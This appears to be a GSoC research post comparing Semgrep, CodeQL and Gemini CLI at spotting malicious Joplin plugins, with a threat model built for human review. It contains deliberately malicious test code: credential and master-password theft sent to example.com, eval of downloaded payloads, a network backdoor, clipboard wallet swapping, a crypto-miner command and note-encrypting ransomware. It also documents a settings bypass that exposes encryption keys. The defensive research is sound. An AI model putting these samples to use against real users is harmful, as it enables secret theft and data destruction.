Plugin Security Tool Comparison -- CodeQL, Semgrep & Gemini CLI

Hi, as part of my GSoC work I ran three static analysis tools across a set of Joplin plugins to see how well each one detects malicious behavior. Here's what I found.


The Tools

CodeQL is GitHub's semantic analysis engine. It's powerful but requires writing QL queries and building a database per repo - the highest setup cost of the three.

Semgrep is a pattern-based scanner that runs YAML rules against source code. It's the easiest to plug into a CI pipeline and the fastest to get running.

Gemini 3.1 pro preview CLI is Google's AI-assisted tool. It reads the code and produces a structured security report with a risk score and verdict. No custom rules needed.


Tests:

Semgrep Scan: joplin-plugin-jarvis

No custom rules were written; everything the scanner reported came from its own default rules.

| File | Rule | Line | Issue |
| --- | --- | --- | --- |
| src/commands/chat.ts | Non-literal RegExp | 274 | new RegExp(nc, 'g'): dynamic regex built from a variable, vulnerable to ReDoS |
| src/commands/chat.ts | Non-literal RegExp | 274 | new RegExp(prompt_override): same line, second dynamic argument flagged |
| src/commands/notes.ts | Unsafe format string | 157 | `` console.debug(`Skipping note ${noteId}`) ``: variable in log string |
| src/models/models.ts | Unsafe format string | 726 | `` console.info(`Jarvis: Loaded ${this.embeddings.length}...`) ``: variable in log string |
| src/research/papers.ts | Unsafe format string | 296 | `` console.debug(`Error processing paper ${i}`) ``: variable in log string |
| src/research/wikipedia.ts | Unsafe format string | 169 | `` console.debug(`Error processing Wikipedia page ${i}`) ``: variable in log string |
| src/utils.ts | Non-literal RegExp | 182 | new RegExp(patterns.join(''), 'is'): dynamic regex from a joined array, vulnerable to ReDoS |

Observation:
The "Unsafe format string" findings are all false positives, produced by the javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring rule. Excluding that rule removed these alerts.
The "Non-literal RegExp" findings do point at a possible ReDoS weakness in the plugin, but that is not the kind of malicious behavior we are looking for. They come from the javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp rule.
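For context on why the non-literal RegExp rule fires: any string that reaches new RegExp() unescaped can bring its own pattern syntax with it. Below is a minimal sketch of the usual mitigation, assuming the variable is meant to be matched as literal text. The helper names are mine and are not taken from the Jarvis source.

```typescript
// Hypothetical helper, not from the Jarvis code base: escape every character
// that has a special meaning in a JavaScript regular expression.
function escapeRegExp(text: string): string {
  return text.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
}

// Build a global matcher that treats `needle` as literal text.
function literalMatcher(needle: string): RegExp {
  return new RegExp(escapeRegExp(needle), "g");
}

// "(a+)+$" would be a backtracking-prone pattern if used as a raw regex;
// once escaped it only matches those exact characters.
const matcher = literalMatcher("(a+)+$");
console.log("x(a+)+$y".replace(matcher, "_")); // x_y
```

Whether Jarvis needs this depends on whether nc and prompt_override are supposed to carry regex syntax, which I did not check.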

After excluding both of these rules, I ran the scan again on plugin-conflict-resolution, this time with custom malicious test code added to it:

| File | Rule | Line | Issue |
| --- | --- | --- | --- |
| src/vulnerabilities.ts | react-insecure-request | 17 | Unencrypted request over HTTP detected (axios.get('http://malicious.com/code.js')). |
| src/vulnerabilities.ts | eval-detected | 18 | Detected the use of eval(). May be a code injection vulnerability. |
| src/vulnerabilities.ts | react-insecure-request | 27 | Unencrypted request over HTTP detected (fetch('http://malicious.com/steal-db')). |
| src/vulnerabilities.ts | react-insecure-request | 43 | Unencrypted request over HTTP detected (axios.post('http://malicious.com/steal-notes')). |
| src/vulnerabilities.ts | weak-symmetric-mode | 49 | Weak cryptographic mode detected (createCipheriv('aes-256-cbc')). Recommend AES-256-GCM. |
| src/vulnerabilities.ts | react-insecure-request | 68 | Unencrypted request over HTTP detected (fetch('http://malicious.com/exfiltrate-export')). |

The scanner is still running purely on its own default rules. It caught a few of the things it should catch but missed many. Here is the breakdown of what it caught and what it missed:

| Threat Category | Code / Attack Mechanism | Scanner Status | Why it happened |
| --- | --- | --- | --- |
| Data Exfiltration | fetch() / axios to malicious.com | :white_check_mark: Caught | Flagged by react-insecure-request. The scanner correctly identified unauthorized HTTP network traffic. |
| Remote Code Execution | eval(remoteCode.data) | :white_check_mark: Caught | Flagged by eval-detected. The scanner knows that executing dynamic strings is a massive security risk. |
| System Command Execution | child_process.exec('curl... bash') | :cross_mark: Missed | Default Node.js rulesets ignore this because legitimate backend web servers use it all the time. |
| Destructive File Access | fs.readFileSync & fsExtra.removeSync | :cross_mark: Missed | Reading and deleting files is standard Node.js behavior. The scanner doesn't know plugins shouldn't do this to system folders. |
| Network Backdoor | net.createServer(...) | :cross_mark: Missed | Standard Node web apps create servers, so the tool assumes it is safe behavior. |
| Joplin API: Ransomware | joplin.data.put (encrypting existing notes) | :cross_mark: Missed | The scanner has no knowledge of Joplin's custom API or what joplin.data.put does. |
| Joplin API: Malicious Interop | joplin.interop.registerExportModule | :cross_mark: Missed | The scanner is completely blind to Joplin-specific plugin architecture and data-passing methods. |

These observations show exactly two things:

  • Semgrep is completely unaware of what the Joplin APIs are.

  • Semgrep is completely unaware that the code it is scanning belongs to a plugin. The code is written in TS/JS, but a plugin should not do everything that standard Node.js code does, such as fs.readFileSync and fsExtra.removeSync (reading and deleting files) or child_process.exec('curl... bash') (running a system command). Even when a plugin does this for a good reason, it should be flagged once so the human reviewer can check what it is actually doing.
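To make the second point concrete, here is a rough sketch of the "flag it once for the reviewer" idea: a text-level check that reports imports of Node modules a plugin rarely needs. The module list and all names are illustrative assumptions, not an official Joplin policy or part of any of the three tools.

```typescript
// Modules a reviewer would want surfaced in a plugin (assumed list).
const SENSITIVE_MODULES = new Set(["child_process", "fs", "fs-extra", "net"]);

interface ImportFinding {
  line: number;
  module: string;
}

// Flags `import ... from 'x'`, `require('x')`, and `joplin.require('x')`
// when x is in the sensitive list. This is plain text matching with no
// parsing, so commented-out code is flagged as well.
function findSensitiveImports(source: string): ImportFinding[] {
  const findings: ImportFinding[] = [];
  source.split("\n").forEach((text, index) => {
    // A fresh RegExp per line keeps lastIndex from leaking between lines.
    const pattern = /(?:from\s+|require\(\s*)['"]([^'"]+)['"]/g;
    let match: RegExpExecArray | null;
    while ((match = pattern.exec(text)) !== null) {
      if (SENSITIVE_MODULES.has(match[1])) {
        findings.push({ line: index + 1, module: match[1] });
      }
    }
  });
  return findings;
}

const sample = [
  "import joplin from 'api';",
  "import * as child_process from 'child_process';",
  "const fs = joplin.require('fs-extra');",
].join("\n");

// Reports child_process on line 2 and fs-extra on line 3.
console.log(findSensitiveImports(sample));
```

A finding here does not mean the plugin is malicious; it only gives the reviewer a line to look at.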


CodeQL Scan: joplin-plugin-jarvis

Similarly, no custom rules were written for CodeQL; it is doing exactly what it was built to do.

| File | Rule | Line | Issue |
| --- | --- | --- | --- |
| models/openai.ts | Incomplete URL substring sanitization | 19 | 'azure.com' can be anywhere in the URL, and arbitrary hosts may come before or after it. |
| models/openai.ts | Incomplete URL substring sanitization | 26 | 'api.anthropic.com' can be anywhere in the URL, and arbitrary hosts may come before or after it. |
| utils.ts | Bad HTML filtering regexp | 374 | This regular expression does not match script end tags like `</script>`. |
| research/pubmed.ts | Double escaping or unescaping | 381 | This replacement may produce & characters that are double-unescaped. |
| research/wikipedia.ts | Incomplete multi-character sanitization | 125 | This string may still contain `<script`, which may cause an HTML element injection vulnerability. |
| utils.ts | Incomplete multi-character sanitization | 373 | This string may still contain `<style`, which may cause an HTML element injection vulnerability. |
| utils.ts | Incomplete multi-character sanitization | 373 | This string may still contain `<script`, which may cause an HTML element injection vulnerability. |

RESULT: In short, CodeQL gave better findings than Semgrep. But every result outside the models/ folder was an XSS-type finding, which Laurent has explicitly stated we are not looking for.
The two findings in the models/ folder relate to SSRF, which could be useful to know about, since a user can trick the app by placing 'azure.com' or 'api.anthropic.com' somewhere in a custom malicious URL.
However, this is not "malicious" behavior by the Jarvis plugin itself, so it is not useful for our purpose.
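To illustrate what "Incomplete URL substring sanitization" means in practice, here is a small sketch comparing a substring check with a hostname check. The function names and the allowed suffix are assumptions made for this example; the actual code in models/openai.ts may look different.

```typescript
// Substring check of the kind CodeQL flags: the marker may appear anywhere.
function looksLikeAzureNaive(url: string): boolean {
  return url.includes("azure.com");
}

// Stricter variant: parse the URL and compare the hostname itself.
function isAzureHost(url: string): boolean {
  let hostname: string;
  try {
    hostname = new URL(url).hostname;
  } catch {
    return false; // not a valid absolute URL
  }
  return hostname === "azure.com" || hostname.endsWith(".azure.com");
}

const crafted = "https://attacker.example/azure.com";
console.log(looksLikeAzureNaive(crafted)); // true
console.log(isAzureHost(crafted)); // false
console.log(isAzureHost("https://myresource.openai.azure.com/v1")); // true
```

The crafted URL passes the substring check even though the request would go to attacker.example, which is the case the CodeQL message describes.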

After excluding the XSS and SSRF rules from CodeQL's default rules, I ran the scan on plugin-conflict-resolution, again with custom malicious test code added to it:

| File | Vulnerability | Line | Issue |
| --- | --- | --- | --- |
| lib/codemirror/mode/markdown/markdown.js | Inefficient regular expression | 549 | This part of the regular expression may cause exponential backtracking on strings starting with 'a -=' and containing many repetitions of '= -='. |
| vulnerabilities.ts | Download of sensitive file through insecure connection | 17 | Download of sensitive file from HTTP source. |

"Inefficient regular expression" is another ReDoS case, which we are not looking for.
Hence, out of all the added code, CodeQL flagged:

| Threat Category | Code / Attack Mechanism | CodeQL Status | Why it happened |
| --- | --- | --- | --- |
| Data Exfiltration | fetch() / axios to malicious.com | :cross_mark: Missed | CodeQL did not recognize the outgoing POST/GET requests as unauthorized data leaks. |
| Remote Code Execution | axios.get + eval(remoteCode.data) | :white_check_mark: Caught | Flagged as "Download of sensitive file through insecure connection". CodeQL caught the dangerous HTTP download, though it ignored the eval() itself. |
| System Command Execution | child_process.exec('curl... bash') | :cross_mark: Missed | Default Node.js rulesets ignore this because legitimate backend web servers use it all the time. |
| Destructive File Access | fs.readFileSync & fsExtra.removeSync | :cross_mark: Missed | Reading and deleting files is standard Node.js behavior. The scanner doesn't know plugins shouldn't do this to system folders. |
| Network Backdoor | net.createServer(...) | :cross_mark: Missed | Standard Node web apps create servers, so the tool assumes it is safe behavior. |
| Joplin API: Ransomware | joplin.data.put (encrypting existing notes) | :cross_mark: Missed | The scanner has no knowledge of Joplin's custom API or what joplin.data.put does. |
| Joplin API: Malicious Interop | joplin.interop.registerExportModule | :cross_mark: Missed | The scanner is completely blind to Joplin-specific plugin architecture and data-passing methods. |

These observations also show exactly two things:

  • CodeQL is completely unaware of what the Joplin APIs are.

  • CodeQL is completely unaware that the code it is scanning belongs to a plugin, which should not do everything that ordinary TS/JS code may do.


Further architecture analysis:

Any Joplin plugin can call joplin.settings.globalValues() with no restrictions and retrieve all sync credentials, the E2E master password, and the API token, using only the official plugin API, with zero exploits or sandbox escapes.

import joplin from "api";

joplin.plugins.register({
  onStart: async function () {
    // Read sensitive global settings through the official plugin API.
    const result = await joplin.settings.globalValues([
      "sync.5.password",
      "sync.6.password",
      "sync.8.password",
      "sync.9.password",
      "sync.10.password",
      "encryption.masterPassword",
      "api.token",
      "encryption.passwordCache",
    ]);

    // Write the retrieved values into a new note to show they are readable.
    await joplin.data.post(["notes"], null, {
      title: "test note for hacker",
      body: JSON.stringify(result),
    });
  },
});

Additionally, a plugin developer can get access to both the master key and the master password:

First I tried joplin.data.get(['master_keys']), which is a defined way to fetch the master keys, but it was blocked by a regex filter on path segments that rejects "_":

for (const p of path) {
    if (!this.pathSegmentRegex_.test(p)) {
        throw new Error(`Path segments must only contain lowercase letters and digits: ${JSON.stringify(path)}`);
    }
}

So I read "syncInfoCache" instead, and it worked: I got both the key and the master password.

I believe Joplin settings and plugins currently work on the assumption that "if a user has installed a plugin, they trust it", i.e. the plugin gets access to every defined setting. Since we are moving from a trust-by-default to a review-by-default model, it would be good to flag this specific bypass.
A plugin can read a secret and silently send it out through a network request without the user ever knowing, and it can read both the user's key and password.

Update to threat model:

What it is: The plugin attempts to read or extract the application's Master Password, Master Encryption Keys, or Sync Target Credentials, regardless of the API path used. Because plugins operate in a trusted environment, extracting these assets constitutes a compromise of the user's privacy and must be flagged for review.

Known Attack Vectors:

  • Any call to joplin.settings.globalValue or globalValues that explicitly targets "syncInfoCache", "encryption.masterPassword", "sync.*.password", "api.token", "encryption.cachedPpk", or "encryption.passwordCache" should be flagged for review.

  • Additionally, if the data is read and then sent in a network request, saved silently to a note, written to the local file system, passed to a system command (child_process), or injected into an external webview, it should be marked as critical and must be reviewed.

  • If a plugin fetches both "encryption.masterPassword" and the encryption key, it should also be marked for review.
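The first attack vector above can be sketched as a key matcher. This is only an illustration of how the "sync.*.password" wildcard could be handled; the function names are hypothetical, and treating "*" as exactly one dot-free segment is my assumption.

```typescript
// Keys taken from the attack-vector list above. "*" stands for one
// dot-free segment, such as a sync target number (assumed meaning).
const SENSITIVE_SETTING_PATTERNS = [
  "syncInfoCache",
  "encryption.masterPassword",
  "encryption.cachedPpk",
  "encryption.passwordCache",
  "sync.*.password",
  "api.token",
];

// Convert a pattern such as "sync.*.password" into an anchored RegExp,
// escaping everything except the wildcard.
function patternToRegExp(pattern: string): RegExp {
  const escaped = pattern
    .split("*")
    .map((part) => part.replace(/[.*+?^${}()|[\]\\]/g, "\\$&"))
    .join("[^.]+");
  return new RegExp("^" + escaped + "$");
}

const sensitiveMatchers = SENSITIVE_SETTING_PATTERNS.map(patternToRegExp);

function isSensitiveSettingKey(key: string): boolean {
  return sensitiveMatchers.some((matcher) => matcher.test(key));
}

console.log(isSensitiveSettingKey("sync.10.password")); // true
console.log(isSensitiveSettingKey("encryption.masterPassword")); // true
console.log(isSensitiveSettingKey("theme")); // false
```

A real rule would also need to follow where the returned value goes, which is the second bullet and cannot be done with key matching alone.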


Threat Model:

All of the above observations show the need to write custom rules for the tools and to define a threat model, so that the tools know what we have to detect.
Since human review is a mandatory part of the pipeline, the threat model has to cover both "this is bad" and "this may be bad" scenarios, so the reviewer knows what to review.
Tools by themselves do not know what a person wants to see flagged in the code. Through the custom rules and the threat model, we tell the tool which things to flag so that the human reviewer can read the report in the issue and quickly check them.
The following is the threat model I have defined so far, with the reason each item should be flagged:

Phase 1: Critical Threats

  1. Dynamic Code Execution: The plugin downloads a hidden script from the internet and executes it dynamically. Attack Vectors: Usage of eval() or bypassing joplin.require to use native require('child_process') with remote payloads.

  2. Secret & Key Theft: The plugin attempts to read the application's Master Password, Encryption Keys, or Sync Credentials. Attack Vectors: Calling joplin.settings.globalValue(s) targeting syncInfoCache, encryption.masterPassword, encryption.cachedPpk, encryption.passwordCache, sync.*.password, sync.*.auth, sync.*.context, sync.5.username, sync.6.username, sync.9.username, sync.10.username, sync.10.userEmail, sync.userId, or clientId. This is critical if the data is piped to a network request, written to disk, passed to child_process, or injected into an external webview.

  3. Electron Main Process Takeover: Gaining direct access to the main Electron process to control the app window or bypass renderer restrictions. Attack Vectors: Any import or requirement of @electron/remote.

  4. Archive Extraction Attack: Using maliciously crafted zip files to overwrite sensitive files outside the intended directory, silently replacing database.sqlite or config files. Attack Vectors: Usage of joplin.fs.archiveExtract() where either argument originates from user input or a remotely fetched source. This should be flagged so a reviewer can check what the zip extraction is actually doing.

  5. Mass Data Destruction: Iterating through notes or folders and permanently destroying the user's database. Attack Vectors: joplin.data.delete() appearing inside a loop iterating over joplin.data.get(['notes']) or joplin.data.get(['folders']). The LLM should check the purpose of the iteration and report it accordingly.

  6. Keylogging & Silent Surveillance: Silently monitoring everything a user reads or types in real-time and exfiltrating it. Attack Vectors: onNoteContentChange or onNoteChange combined directly with network requests (fetch, axios).

  7. Unauthorized FS Access & Self-Modification: Bypassing official APIs to read/rewrite core configs (database.sqlite), or rewriting its own source files after installation to swap code for malware. Attack Vectors: Usage of native fs or joplin.require('fs-extra') targeting __dirname + '/index.js' or ~/.config/joplin-desktop.

  8. Network Backdoors: Opening a listening port on the user's local network. Attack Vectors: Usage of net.createServer().

  9. Clipboard Hijacking: Rapidly reading the clipboard to find sensitive data and swapping it. Attack Vectors: Background loops calling joplin.clipboard.readText() and joplin.clipboard.writeText().

  10. Native Binary & Cryptojacking: Dynamically downloading/unpacking compiled binaries, spawning miners, or using Web Workers for crypto-mining. Attack Vectors: Exploiting Node.js integration via child_process or hidden BrowserWindows.

  11. Native Module Imports: Bypassing the joplin.require() API to gain full host machine access. Attack Vectors: Direct imports of child_process, net, os, dgram via require(), window.require(), or TypeScript import statements.

  12. Silent Data Persistence: Storing execution commands or exfiltrated data invisibly. Attack Vectors: Storing data with joplin.data.userDataSet(), then reading it back with joplin.data.userDataGet() and passing the result directly to eval(), exec(), or fetch().
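Item 4 above comes down to archive entry names that climb out of the destination folder. Below is a minimal sketch of the check a reviewer would hope to see before extraction, assuming entry names use / or \ as separators. The function name is hypothetical, and this says nothing about how joplin.fs.archiveExtract() is implemented internally.

```typescript
// Hypothetical check: does an archive entry name stay inside the folder
// it is extracted into? Pure string logic, no file system access.
function entryStaysInsideDestination(entryName: string): boolean {
  // Absolute paths (POSIX, UNC, or Windows drive letters) always escape.
  if (/^([\\/]|[A-Za-z]:)/.test(entryName)) {
    return false;
  }
  let depth = 0;
  for (const segment of entryName.split(/[\\/]+/)) {
    if (segment === "" || segment === ".") {
      continue;
    }
    if (segment === "..") {
      depth -= 1;
      if (depth < 0) {
        return false; // climbed above the destination folder
      }
    } else {
      depth += 1;
    }
  }
  return true;
}

console.log(entryStaysInsideDestination("notes/today.md")); // true
console.log(entryStaysInsideDestination("../../database.sqlite")); // false
console.log(entryStaysInsideDestination("a/../../config.json")); // false
```

The check is deliberately conservative: anything that looks absolute is rejected, even if the extractor would have handled it safely.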

Phase 2: Dual-Use Data Flows

  1. Command Execution: Running terminal commands via child_process. Attack Vectors: Data flowing into shell execution. The reviewer must verify if it is a legitimate tool or a malicious script.

  2. Data Exfiltration: Using joplin.data.get to bulk-read notes and piping that data into fetch() or axios. Attack Vectors: Note data flowing to network. The reviewer must verify the destination URL.

  3. Mass Encryption / Ransomware: A flow combining note reading, cryptographic modules, and overwriting the originals. Attack Vectors: joplin.data.get piped to joplin.data.put via crypto. The reviewer must verify whether this is a legitimate encryption feature.

  4. Silent Backup Hijacking: Registering a custom export format while secretly piping the plaintext data to an external server. Attack Vectors: fetch() or network requests inside a joplin.interop.registerExportModule callback.

  5. Malicious Import Module: Registering a custom import format that injects malicious notes, corrupts the database, or drops payload files. Attack Vectors: Malicious payloads inside a joplin.interop.registerImportModule callback.

  6. Remote External Webviews: Creating a UI panel but setting the source to an external URL. Attack Vectors: <iframe src="..."> in panel HTML. The reviewer must verify the trusted status of the external service.
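For item 6, the interesting distinction is between panel HTML that is built locally and panel HTML that embeds a remote page. A rough sketch of that distinction, assuming the HTML is available as a string (the function name is hypothetical, and a real rule would parse the HTML rather than use a regex):

```typescript
// Collect iframe sources that point at an absolute or protocol-relative
// http(s) URL. Regex-based on purpose to keep the sketch short.
function findExternalFrameSources(html: string): string[] {
  const sources: string[] = [];
  const pattern = /<iframe\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi;
  let match: RegExpExecArray | null;
  while ((match = pattern.exec(html)) !== null) {
    if (/^(https?:)?\/\//i.test(match[1])) {
      sources.push(match[1]);
    }
  }
  return sources;
}

const localPanel = '<div class="panel"><style>p { margin: 0; }</style></div>';
const remotePanel = '<iframe src="https://example.com/remote_app"></iframe>';

console.log(findExternalFrameSources(localPanel).length); // 0
console.log(findExternalFrameSources(remotePanel).length); // 1
```

Only the second panel would be handed to the reviewer, who then decides whether the external service is trusted.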

False Positives:

Several Phase 2 items are dual-use by nature and will flag legitimate plugins (e.g., child_process for Python integrations, fetch + data.get). This is intentional. Phase 2 exists precisely because human review is mandatory. The LLM scanner is prompted to consider context before flagging, reducing noise compared to rule-based tools.

Note: This threat model consists mostly of data flows, which is why it is no longer practical to express it as custom Semgrep rules. A small study at the end of the SAST section tests specifically why Semgrep cannot be used anymore.
Also, a few new threats were added after the initial tests, so the tests below were run with slightly less threat model coverage.

Here is the report CodeQL generated on plugin-conflict-resolution with the custom malicious code:

| Vulnerability / Rule | Description | Severity | File | Position (Line:Col) |
| --- | --- | --- | --- | --- |
| Unauthorized Native Module Bypasses | Detects direct imports of 'child_process', bypassing the safe 'joplin.require' method. | warning | /vulnerabilities.ts | 2:8 - 2:25 |
| Network Backdoors | Detects local servers being spun up which may indicate a backdoor. | warning | /vulnerabilities.ts | 30:20 - 33:6 |
| Data Exfiltration (Notes to Network) | Detects Joplin notes data flowing to external network requests. | warning | /vulnerabilities.ts | 43:58 - 43:62 |
| Direct File System / Sandbox Escape | Detects hardcoded sensitive paths or traversals flowing into file system APIs. | warning | /vulnerabilities.ts | 26:36 - 26:41 |
| Secret and Key Theft | Detects sensitive environment variables or settings data exfiltrated via network requests. | warning | /vulnerabilities.ts | 22:17 - 22:65 |

CodeQL generated a good report, was able to follow code across files, and gave exact lines to look at. The threat model seems to work well, as it improved the CodeQL results considerably:

| Threat Category | Code / Attack Mechanism | Status |
| --- | --- | --- |
| Data Exfiltration | fetch() / axios to malicious.com | :white_check_mark: Caught |
| Remote Code Execution | axios.get + eval(remoteCode.data) | :white_check_mark: Caught |
| System Command Execution | child_process.exec('curl... bash') | :white_check_mark: Caught |
| Destructive File Access | fs.readFileSync & fsExtra.removeSync | :white_check_mark: Caught |
| Network Backdoor | net.createServer(...) | :white_check_mark: Caught |
| Joplin API: Ransomware | joplin.data.put (encrypting existing notes) | :white_check_mark: Caught |
| Joplin API: Malicious Interop | joplin.interop.registerExportModule | :white_check_mark: Caught |

(It returned clean for Jarvis.)

RESULT:

CodeQL gave good results once it was told what to look for. But as seen earlier, without the custom rules it could not identify most of the things we want to see. This means it is now bound to the threat model when generating the report, so the report will mostly contain only what the threat model defines, leaving a huge zero-day blind spot.


LLM as a scanner:

An LLM would be a great tool to use here, as the main problems with the other tools are the lack of context about what the Joplin plugin API actually is, and the need to define a threat model to write custom rules against.
Many Joplin plugins are made by community developers, so although a threat model can be defined, new things that a reviewer would want to see in the report will keep coming up.
An LLM is not bound to any rule or threat model. Although the threat model will be included in the prompt, LLMs are also good enough to report zero-day malicious code.

The scan result from gemini 3.1 pro preview with threat model defined on joplin-plugin-jarvis :

The scan result from gemini 3.1 pro preview with threat model defined on plugin-conflict-resolution with custom malicious code :

| Threat Category | Code / Attack Mechanism | LLM Status |
| --- | --- | --- |
| Data Exfiltration | joplin.data.get -> axios.post() | :white_check_mark: Caught |
| Remote Code Execution | axios.get() + eval() | :white_check_mark: Caught |
| System Command Execution | child_process (curl... bash) | :white_check_mark: Caught |
| Secret & Key Theft | process.env -> fetch() | :white_check_mark: Caught |
| Sandbox Escape / File Access | fs (SQLite) / fs-extra (absolute) | :white_check_mark: Caught |
| Network Backdoor | net.createServer().listen(1337) | :white_check_mark: Caught |
| Joplin API: Ransomware | Read -> crypto.createCipheriv -> Put | :white_check_mark: Caught |
| Joplin API: Malicious Interop | registerExportModule -> fetch() | :white_check_mark: Caught |

The threat model seems to be working correctly: the well-known joplin-plugin-jarvis, which is not malicious, was not flagged as malicious, while its use of fetch() after joplin.notes.get was flagged so that a human reviewer can check that nothing is wrong.
Additionally, the LLM is not bound to the threat model alone. It reads the code and looks for anything else that should be flagged, similar to what the threat model defines.


More observations:

Why were these tests done?

To verify whether the threat model generates any noise and, if so, whether that noise is useful and should be added to the threat model.
Additionally, the LLM was used to scan for any flow used by a plugin that should be added to the threat model.

The 4 most popular plugins all passed the LLM and CodeQL scans with a clean result:
Note: The LLM was also free to look for malicious code patterns similar to those in the threat model.

joplin-inline-todo :white_check_mark: Clean
joplin-rich-markdown :white_check_mark: Clean
plugin-templates :white_check_mark: Clean
plugin-yesyoukan :white_check_mark: Clean

CodeQL produced a little noise on plugin-templates:

| Issue / Rule | Severity | File Location | Description |
| --- | --- | --- | --- |
| Useless regular-expression character escape | Error | /parser.ts (Line 211, Col 48, Col 63) | The escape sequence \S is equivalent to just S. Prepending a backslash to an ordinary character in a string does not have any effect. |

This is a code quality finding from the "useless-regexp-character-escape" rule, which is now excluded from the rules.
Further tests:
joplin-math-mode :white_check_mark: Clean
joplin-note-tabs :white_check_mark: Clean
joplin-plugin-extra-editor-settings :white_check_mark: Clean
joplin-plugin-quick-links :white_check_mark: Clean
joplin-inline-tags-plugin :white_check_mark: Clean
joplin-plugin-combine-notes :white_check_mark: Clean
joplin-plugin-diff-tool :white_check_mark: Clean
joplin-plugin-table-formatter :white_check_mark: Clean

New updates to the threat model after these tests:

  • Self-Modifying Code / Silent Payloads: What it is: The plugin uses fs or fs-extra to rewrite its own source files (e.g., overwriting __dirname + '/index.js') after installation to swap code for malware, bypassing initial CI scans.

  • Cryptojacking / Resource Theft: What it is: Exploiting Node.js integration to use child_process to spawn native mining binaries, or utilizing Web Workers in the hidden BrowserWindow to run crypto-miners in the background.


Now I had all the rules written. I made a file containing dummy code for every rule scenario to check how both CodeQL and the LLM would perform:

import joplin from 'api';
import * as child_process from 'child_process';
import * as net from 'net';
import * as crypto from 'crypto';

const fs = joplin.require("fs-extra");

export async function codeql_test_dynamic_code_execution() {
    const response = await fetch('https://example.com/payload.js');
    const payload = await response.text();
    eval(payload); 
}

export async function codeql_test_secret_theft() {
    const masterPassword = await joplin.settings.globalValue('encryption.masterPassword'); 
    const syncCache = await joplin.settings.globalValue('syncInfoCache');

    await fetch('https://example.com/exfiltrate', {
        method: 'POST',
        body: JSON.stringify({ p: masterPassword, s: syncCache })
    });
}

export async function codeql_test_unauthorized_fs_access() {
    const pluginDir = __dirname; 
    const targetFile = `${pluginDir}/index.js`; 
    fs.writeFileSync(targetFile, "console.log('malware swapped');"); 
}

export async function codeql_test_network_backdoors() {
    const server = net.createServer((c) => { 
        c.write('backdoor active\r\n');
    });
    server.listen(8124); 
}

export async function codeql_test_clipboard_hijacking() {
    const clipContent = await joplin.clipboard.readText(); 
    if (clipContent.includes('wallet')) {
        await joplin.clipboard.writeText('attacker_wallet_address'); 
    }
}

export async function codeql_test_cryptojacking() {
    child_process.exec('xmrig -o pool.minexmr.com:4444 -u wallet_addr'); 
}

export async function codeql_test_command_execution() {
    const userCmd = "ls -la";
    child_process.exec(userCmd); 
}

export async function codeql_test_data_exfiltration() {
    const notes = await joplin.data.get(['notes']); 
    await fetch('https://example.com/sync', {
        method: 'POST',
        body: JSON.stringify(notes) 
    });
}

export async function codeql_test_mass_encryption() {
    const notes = await joplin.data.get(['notes']); 
    for (const note of notes.items) {
        const cipher = crypto.createCipheriv('aes-256-cbc', 'key', 'iv');
        let encrypted = cipher.update(note.body, 'utf8', 'hex');
        encrypted += cipher.final('hex');
        await joplin.data.put(['notes', note.id], null, { body: encrypted }); 
    }
}

export async function codeql_test_backup_hijacking() {
    await joplin.interop.registerExportModule({
        format: 'custom',
        description: 'Custom Export',
        target: fs.Directory,
        isNoteArchive: false,

        onInit: async (context: any) => {
            const data = context.exportData;
            await fetch('https://example.com/steal_backup', { method: 'POST', body: data });
        },

        onProcessItem: async (context: any, itemType: number, item: any) => {},
        onProcessResource: async (context: any, resource: any, filePath: string) => {},
        onClose: async (context: any) => {}
    });
}

export async function codeql_test_remote_webviews() {
    const htmlContent = `<iframe src="https://example.com/remote_app"></iframe>`; 
    const view = await joplin.views.panels.create('panel_1');
    await joplin.views.panels.setHtml(view, htmlContent); 
}

Result:

| # | Threat | Phase | Maliciousness | LLM Scan | CodeQL |
| --- | --- | --- | --- | --- | --- |
| 1 | Dynamic Code Execution | 1 | :red_circle: Critical | :white_check_mark: Caught | :white_check_mark: Caught |
| 2 | Secret & Key Theft | 1 | :red_circle: Critical | :white_check_mark: Caught | :white_check_mark: Caught |
| 3 | Unauthorized FS / Self-Modification | 1 | :red_circle: Critical | :white_check_mark: Caught | :white_check_mark: Caught |
| 4 | Network Backdoor | 1 | :red_circle: Critical | :white_check_mark: Caught | :white_check_mark: Caught |
| 5 | Clipboard Hijacking | 1 | :red_circle: Critical | :white_check_mark: Caught | :white_check_mark: Caught |
| 6 | Cryptojacking / Binary Dropping | 1 | :red_circle: Critical | :white_check_mark: Caught | :white_check_mark: Caught |
| 7 | Command Execution | 2 | :orange_circle: High | :white_check_mark: Caught | :white_check_mark: Caught |
| 8 | Data Exfiltration (notes → network) | 2 | :orange_circle: High | :white_check_mark: Caught | :white_check_mark: Caught |
| 9 | Mass Encryption / Ransomware | 2 | :orange_circle: High | :white_check_mark: Caught | :white_check_mark: Caught |
| 10 | Silent Backup Hijacking | 2 | :orange_circle: High | :white_check_mark: Caught | :white_check_mark: Caught |
| 11 | Remote Webview Scripts | 2 | :yellow_circle: Medium | :white_check_mark: Caught | :white_check_mark: Caught |

Originally, only the LLM caught all the threats. The initial CodeQL rules were largely ineffective and caught only 3 of the 11 threats. Several changes had to be made before CodeQL caught all of them.

Trade-offs: CodeQL is not good at following complex data flows, such as data being extracted, wrapped in a new object, and then passed to JSON.stringify. In that case CodeQL lost track of the data and did not know that the new object contained the data being followed.

What had to be done to solve it? Several new rules were added and old rules were updated to simply check:

  • do data.get() and fetch appear in the same function?
  • do data.get(), a crypto call, and joplin.data.put() appear in the same file?
  • is there a fetch() or file write inside a registerExportModule callback?
    etc.
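The first of these checks can be illustrated outside of CodeQL. The sketch below is not the QL rule I wrote; it is a plain TypeScript approximation of the same co-occurrence idea, with a hypothetical function name, applied to a function body given as text.

```typescript
// Co-occurrence check on one function body: true when a note read and a
// network call both appear, regardless of how the data travels in between.
function readsNotesAndCallsNetwork(functionBody: string): boolean {
  const readsNotes = /\bjoplin\.data\.get\s*\(/.test(functionBody);
  const callsNetwork = /\b(fetch|axios(\.\w+)?)\s*\(/.test(functionBody);
  return readsNotes && callsNetwork;
}

// The note data is wrapped in a new object before JSON.stringify, the
// kind of hop described above as losing the taint.
const wrappedFlow = `
  const notes = await joplin.data.get(['notes']);
  const envelope = { payload: notes };
  await fetch('https://example.com/sync', { method: 'POST', body: JSON.stringify(envelope) });
`;

const networkOnly = `
  const response = await fetch('https://example.com/version');
`;

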